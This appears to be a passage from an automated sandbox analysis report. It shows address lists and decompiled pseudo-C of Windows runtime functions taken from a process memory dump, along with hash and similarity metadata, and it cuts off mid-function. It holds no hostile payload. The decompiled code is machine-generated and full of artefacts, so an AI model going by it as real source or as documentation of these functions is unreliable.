0x03452624
0x03452627
0x03452627
0x00000000
0x00000000
0x03495b1f
0x00000000
0x00000000
0x03452894
0x0345289b
0x0345289d
0x034528a1
0x03495b2b
0x03495b2e
0x03495b2e
0x034528a7
0x034528a9
0x03495b04
0x03495b09
0x03495b09
0x03495b09
0x00000000
0x00000000
0x03495b35
0x03495b3c
0x034528fb
0x034528fb
0x034526cc
0x034526cc
0x034526d0
0x00000000
0x034526d2
0x034526d2
0x00000000
0x034526d2
0x00000000
0x00000000
0x034525fe
0x0345292d
0x03452930
0x03452935
0x0345293c
0x0345293e
0x03452958
0x0345295a
0x0345295d
0x03452962
0x03452966
0x0345296a
0x0345296e
0x03452972
0x03452974
0x0345297e
0x0345297f
0x03452980
0x03452981
0x03452982
0x03452983
0x03452984
0x03452985
0x03452986
0x03452987
0x03452988
0x03452989
0x0345298a
0x0345298b
0x0345298c
0x0345298d
0x0345298e
0x0345298f
0x03452990
0x03452992
0x03452997
0x034529a3
0x034529a6
0x034529ab
0x034529ad
0x034529b0
0x034529b2
0x03495c80
0x034529b8
0x034529b8
0x034529bb
0x034529c0
0x034529c5
0x034529c6
0x034529c6
0x034529c9
0x034529cb
0x00000000
0x00000000
0x034529cd
0x034529d0
0x034529d9
0x034529db
0x034529dd
0x03452a7f
0x03452a84
0x03452a87
0x03452a89
0x03495ca1
0x03495ca3
0x00000000
0x03452a8f
0x03452a8f
0x00000000
0x03452a8f
0x00000000
0x034529e3
0x034529e3
0x034529e3
0x00000000
0x034529e3
0x034529dd
0x00000000
0x034529db
0x034529e6
0x034529e9
0x034529eb
0x034529ed
0x034529f3
0x034529f5
0x034529f8
0x034529fa
0x03452a97
0x03452a9a
0x03452a9d
0x03452add
0x00000000
0x03452a9f
0x03452aa2
0x03452aa5
0x03452aa8
0x03452aab
0x03495cab
0x03495caf
0x03495cc5
0x03495cda
0x03495cdc
0x03495cdf
0x03495ce5
0x00000000
0x03495ceb
0x03495ced
0x03495cee
0x00000000
0x03495cee
0x03495cb1
0x03495cb4
0x03495cb9
0x03495cbb
0x00000000
0x03495cbd
0x03495cbd
0x00000000
0x03495cbd
0x03495cbb
0x03452ab1
0x03452ab1
0x03452ac4
0x03452ac6
0x03452ac6
0x00000000
0x03452ac6
0x03452aab
0x00000000
0x03452a00
0x03452a09
0x03452a0e
0x03452a21
0x03452a24
0x03452a35
0x03452a3a
0x03452a3d
0x03452a42
0x03452a59
0x03452a59
0x03452a5c
0x03452a5f
0x03452a5f
0x034529fa
0x034529f3
0x03452a64
0x03452a64
0x03452a6b
0x03452a6b
0x03452a6d
0x03452a72
0x03452a72
0x00000000

Strings

PATH, xrefs: 03452642, 03452691

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 0b4c59be1489cba98bac60eb77773bdffeb5030b4208cb598a546524a640b5ab
Instruction ID: add1b49792493921311ff8f11a2cace770a1586c45354ac7e6233f50726b2ad5
Opcode Fuzzy Hash: 0b4c59be1489cba98bac60eb77773bdffeb5030b4208cb598a546524a640b5ab
Instruction Fuzzy Hash: ACC19075E002199FDB15DF99D880AAEB7B0FF48700F18442BF811AF361D7B4A946CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0345FAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0345FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0343EEF0(0x3517b60);
					_t134 =  *0x3517b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x3517b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x3517b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E03436D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E034376E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E034C8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0342B150();
													}
													_t116 = E034C6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E034375CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x3518638; // 0x0
																	_t122 = L034338A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E034376E2(_t154);
																			goto L41;
																		}
																	} else {
																		E034376E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0345FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L034370F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0345FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0345FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0345FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0345FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0345FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x3517b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x3517b84 = _t75;
						_t73 = E0343EB70(_t134, 0x3517b60);
						if( *0x3517b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0343FF60( *0x3517b20);
							}
						}
						goto L5;
					}
				}
			}

0x0345fab0
0x0345fab2
0x0345fab3
0x0345fab4
0x0345fabc
0x0345fac0
0x0345fb14
0x0345fb17
0x0345fac2
0x0345fac8
0x0345facd
0x0345fad3
0x0345fad3
0x0345fadd
0x0345fb18
0x0345fb1b
0x0345fb1d
0x0345fb1e
0x0345fb1f
0x0345fb20
0x0345fb21
0x0345fb22
0x0345fb23
0x0345fb24
0x0345fb25
0x0345fb26
0x0345fb27
0x0345fb28
0x0345fb29
0x0345fb2a
0x0345fb2b
0x0345fb2c
0x0345fb2d
0x0345fb2e
0x0345fb2f
0x0345fb3a
0x0345fb3b
0x0345fb3e
0x0345fb41
0x0345fb44
0x0345fb47
0x0345fb4a
0x0345fb4d
0x0345fb53
0x0349bdcb
0x0349bdcb
0x0345fb59
0x0345fb5b
0x0345fb5b
0x0345fb5e
0x0349bdd5
0x0349bdd8
0x00000000
0x0349bdda
0x00000000
0x0349bdda
0x0345fb64
0x0345fb64
0x0345fb64
0x0345fb67
0x0345fb6e
0x0345fb70
0x0345fb72
0x00000000
0x0345fb78
0x0345fb7a
0x0345fb7a
0x0345fb7d
0x0345fb80
0x0349bddf
0x0349bde1
0x00000000
0x0349bde3
0x00000000
0x0349bde3
0x0345fb86
0x0345fb86
0x0345fb86
0x0345fb8b
0x0345fb90
0x0345fb92
0x0345fb94
0x0345fb9a
0x0345fb9b
0x0345fba1
0x0349bde8
0x0349bdeb
0x0349bded
0x0349beb5
0x0349beb5
0x0349bebb
0x0349bebd
0x0349bec3
0x0349bed2
0x0349bedd
0x0349bedd
0x0349beed
0x00000000
0x0349bdf3
0x0349bdfe
0x0349be06
0x0349be0b
0x0349be0d
0x0349be0f
0x0349be14
0x0349be19
0x0349be20
0x0349be25
0x0349be27
0x0349be35
0x0349be39
0x0349be46
0x0349be4f
0x0349be54
0x0349be56
0x0349bef8
0x0349bef8
0x00000000
0x0349be5c
0x0349be5c
0x0349be60
0x00000000
0x0349be66
0x0349be66
0x0349be7f
0x0349be84
0x0349be87
0x0349be89
0x0349be8b
0x0349be99
0x0349be9d
0x0349bea0
0x0349beac
0x0349beaf
0x0349beb1
0x0349beb3
0x0349beb3
0x00000000
0x0349bea2
0x0349bea2
0x00000000
0x0349bea2
0x0349be8d
0x0349be8d
0x0349be92
0x00000000
0x0349be92
0x0349be8b
0x0349be60
0x0349be3b
0x0349be3b
0x0349be3e
0x00000000
0x0349be40
0x0349be40
0x0349be44
0x00000000
0x00000000
0x00000000
0x00000000
0x0349be44
0x0349be3e
0x0349be29
0x0349be29
0x00000000
0x0349be29
0x0349be27
0x00000000
0x0345fba7
0x0345fba7
0x0345fbab
0x0349bf02
0x0345fbb1
0x0345fbb1
0x0345fbb8
0x0345fbbd
0x0345fbbd
0x0345fbbf
0x0345fbbf
0x0345fbc5
0x0345fbcb
0x0345fbf8
0x0345fbf8
0x0345fbfa
0x00000000
0x0345fc00
0x0345fc00
0x0345fc03
0x00000000
0x0345fc09
0x0345fc09
0x0345fc0f
0x0345fc15
0x0345fc23
0x0345fc23
0x0345fc25
0x0345fc27
0x0345fc75
0x0345fc7c
0x0345fc84
0x00000000
0x0345fc29
0x0345fc29
0x0345fc2d
0x0345fc30
0x0349bf0f
0x00000000
0x0345fc36
0x0345fc38
0x0345fc3b
0x0345fc41
0x0349bf17
0x0349bf19
0x0349bf48
0x0349bf4b
0x00000000
0x0349bf1b
0x0349bf22
0x0349bf24
0x0349bf26
0x00000000
0x0349bf2c
0x0349bf37
0x0349bf39
0x0349bf3b
0x00000000
0x0349bf41
0x0349bf41
0x0349bf41
0x0349bf41
0x0349bf45
0x00000000
0x0349bf45
0x0349bf3b
0x0349bf26
0x00000000
0x0345fc47
0x0345fc47
0x0345fc49
0x0345fcb2
0x0345fcb4
0x0345fcb6
0x0345fcdc
0x0345fcdc
0x00000000
0x0345fcb8
0x0345fcc3
0x0345fcc5
0x0345fcc7
0x00000000
0x0345fcc9
0x0345fcc9
0x0345fccd
0x00000000
0x0345fccd
0x0345fcc7
0x00000000
0x0345fc4b
0x0345fc4b
0x0345fc4e
0x0345fc4e
0x0345fc51
0x0345fc51
0x0345fc54
0x0345fc5a
0x0345fc5c
0x0345fc5f
0x0345fc61
0x0345fc63
0x0345fc65
0x0345fc67
0x0345fc6e
0x0345fc72
0x0345fc72
0x0345fc72
0x0345fc72
0x0345fc67
0x0345fc61
0x00000000
0x0345fc5a
0x0345fc49
0x0345fc41
0x0345fc30
0x0345fc27
0x0345fc03
0x0345fbcd
0x0345fbd3
0x0345fbd9
0x0345fbdc
0x0345fbde
0x0345fc99
0x0345fc9b
0x0345fc9d
0x0345fcd5
0x0345fcd5
0x0345fc89
0x0345fc89
0x00000000
0x0345fc9f
0x0345fc9f
0x0345fca3
0x00000000
0x0345fca3
0x00000000
0x0345fbe4
0x0345fbe4
0x0345fbe4
0x0345fbe4
0x0345fbe9
0x0345fbf2
0x00000000
0x0345fbf2
0x0345fbde
0x0345fbcb
0x0345fbab
0x0345fc8b
0x0345fc8b
0x0345fc8c
0x0345fb80
0x0345fb72
0x0345fb5e
0x0345fc8d
0x0345fc91
0x0345fadf
0x0345fadf
0x0345fae1
0x0345fae4
0x0345fae7
0x0345faec
0x0345faf8
0x0345fb00
0x0345fb07
0x0345fb0f
0x0345fb0f
0x0345fb07
0x00000000
0x0345faf8
0x0345fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0349BE0F

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 7bcf3ac5768de2492debe8ca4ba6336e4392c219c186ad626967623247a87877
Instruction ID: 0167d6fc5faca1c276f6fe3d3a0992a7548a0b21fe6ee2595facba7a34c6beb1
Opcode Fuzzy Hash: 7bcf3ac5768de2492debe8ca4ba6336e4392c219c186ad626967623247a87877
Instruction Fuzzy Hash: 11A1EF75E00605CFEB26DB69C450B6AB7A9FB48610F08457FEC46CF791DB30D84A8B89

Uniqueness

Uniqueness Score: -1.00%

Function 03422D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E03422D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x3515350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x3517bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E034697C0();
				}
				if( *0x35179c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x35179c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E03451624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E03447D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E034BFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E03469520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0345E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0347DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x3516901;
								_push(_t109);
								_v52 = _t98;
								if( *0x3516901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E03469980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E034695D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E03447D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E03447D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E034A7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E034BFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x3515350;
							if(_t109 != 0x3515350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E034BFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E034B5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x03422d8a
0x03422d8a
0x03422d92
0x03422d96
0x03422d9e
0x03422da0
0x03422da3
0x03422da5
0x03422da8
0x03422dab
0x03422db2
0x0347f9aa
0x0347f9ab
0x0347f9ae
0x0347f9ae
0x03422db8
0x03422dc2
0x0347f9b9
0x0347f9be
0x0347f9bf
0x0347f9bf
0x03422dcf
0x0347f9c9
0x03422dd5
0x03422dd5
0x03422dd5
0x03422dde
0x03422de1
0x03422e70
0x03422e72
0x03422e72
0x03422de7
0x03422deb
0x03422e7c
0x03422e83
0x03422e85
0x03422e8b
0x03422e8d
0x03422e92
0x03422e92
0x03422e85
0x03422df1
0x03422df7
0x03422df9
0x03422df9
0x03422dfc
0x03422dff
0x03422e02
0x00000000
0x03422e05
0x03422e0c
0x0347f9d9
0x03422e12
0x03422e12
0x03422e12
0x03422e1a
0x0347f9e3
0x0347f9e9
0x0347f9f0
0x0347f9f6
0x0347f9f8
0x0347f9f8
0x0347f9f0
0x03422e23
0x0347fa02
0x0347fa03
0x0347fa05
0x0347fa06
0x00000000
0x03422e29
0x03422e29
0x03422e2e
0x03422e34
0x03422e3e
0x00000000
0x00000000
0x03422e44
0x03422e47
0x03422e4d
0x00000000
0x00000000
0x03422e4f
0x03422e54
0x00000000
0x00000000
0x03422e5a
0x03422e5f
0x03422e9a
0x03422ea4
0x03422ea5
0x03422ea8
0x03422eaf
0x03422eb2
0x03422eb5
0x0347fae9
0x0347faeb
0x0347faed
0x0347faef
0x0347faf7
0x0347faf8
0x0347fafd
0x0347faff
0x0347fb04
0x0347fb04
0x0347faff
0x03422ec0
0x03422ec4
0x03422ec6
0x03422ec8
0x0347fb14
0x0347fb18
0x0347fb1e
0x0347fb21
0x0347fb21
0x03422ece
0x03422ece
0x03422ece
0x03422ed7
0x03422e61
0x03422e63
0x0347fa6b
0x0347fa71
0x0347fa76
0x0347fa78
0x0347fa8a
0x0347fa7a
0x0347fa83
0x0347fa83
0x0347fa8f
0x0347fa91
0x0347fa97
0x0347fa9d
0x0347faa4
0x0347faaa
0x0347faaf
0x0347fab1
0x0347fac3
0x0347fab3
0x0347fabc
0x0347fabc
0x0347fac8
0x0347facb
0x0347fadf
0x0347fadf
0x0347facb
0x0347faa4
0x0347fa91
0x03422e6f
0x03422e6f
0x03422e5f
0x0347fa13
0x0347fa15
0x0347fa17
0x0347fa1f
0x0347fa21
0x0347fa22
0x0347fa25
0x0347fa28
0x0347fa2f
0x0347fa2f
0x0347fa2a
0x0347fa2a
0x0347fa2a
0x0347fa31
0x0347fa34
0x0347fa36
0x0347fa3c
0x0347fa3e
0x0347fa41
0x0347fa43
0x0347fa45
0x0347fa45
0x0347fa41
0x0347fa3c
0x0347fa4a
0x0347fa4f
0x0347fa51
0x0347fa53
0x0347fa56
0x0347fa5b
0x0347fa5e
0x00000000
0x0347fa5e
0x03422e23

Strings

RTL: Re-Waiting, xrefs: 0347FA4A

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 3309ec1ae5bf73443a48b994507510a257014f21d8ce6c99822b20f8eb32aa2e
Instruction ID: 20ff9a17195736d381f5e074ea336cd71eb62d463374dba4bdd8bd90c11038f5
Opcode Fuzzy Hash: 3309ec1ae5bf73443a48b994507510a257014f21d8ce6c99822b20f8eb32aa2e
Instruction Fuzzy Hash: A061F571A006149FDB31DF68C840BBFBBA5EB44710F580AABD421AF3D0D7B49906D799

Uniqueness

Uniqueness Score: -1.00%

Function 034F0EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E034F0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E034EFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E034F1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E03469730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
